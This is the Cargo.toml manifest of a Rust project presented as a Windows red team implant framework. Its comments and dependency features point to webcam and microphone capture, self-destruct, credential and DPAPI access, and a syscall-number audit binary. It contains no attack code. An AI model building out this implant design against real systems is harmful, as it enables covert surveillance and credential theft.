[package]
name        = "redcrab-rt"
version     = "0.1.0"
edition     = "2021"
description = "Windows x64 red team implant framework — authorized engagement tooling"

[[bin]]
name = "redcrab"
path = "src/main.rs"

# Audit binary: never compiled into the implant, only when explicitly requested.
# cargo run --bin ssn_audit --features ssn-audit --target x86_64-pc-windows-msvc
[[bin]]
name = "ssn_audit"
path = "src/ssn_audit.rs"
required-features = ["ssn-audit"]

[features]
ssn-audit = []   # gate: audit tooling — excluded from all release builds

[profile.release]
opt-level     = "z"
lto           = true
codegen-units = 1
panic         = "abort"
strip         = true
debug         = false

# Audit binary keeps debug info so symbols show up in the report output.
[profile.dev]
opt-level = 0
debug     = true

[dependencies]
# windows-rs for Media Foundation (webcam) + WASAPI (mic) + self-destruct
windows = { version = "0.58", features = [
    "Win32_Media_MediaFoundation",
    "Win32_Media_Audio",
    "Win32_System_Com",
    "Win32_Foundation",
    "Win32_Storage_FileSystem",
    "Win32_System_Threading",
    "Win32_Security",
] }
winapi = { version = "0.3", features = [
    "minwindef",
    "ntdef",
    "winnt",
    "libloaderapi",
    "processthreadsapi",
    "handleapi",
    "memoryapi",
    "wingdi",
    "winuser",
    "windef",
    "tlhelp32",
    "winreg",
    "winhttp",
    "wincrypt",
    "wincred",
    "dpapi",
    "securitybaseapi",
    "winbase",
    "errhandlingapi",
    "fileapi",
    "heapapi",
    "sysinfoapi",
    "synchapi",
] }
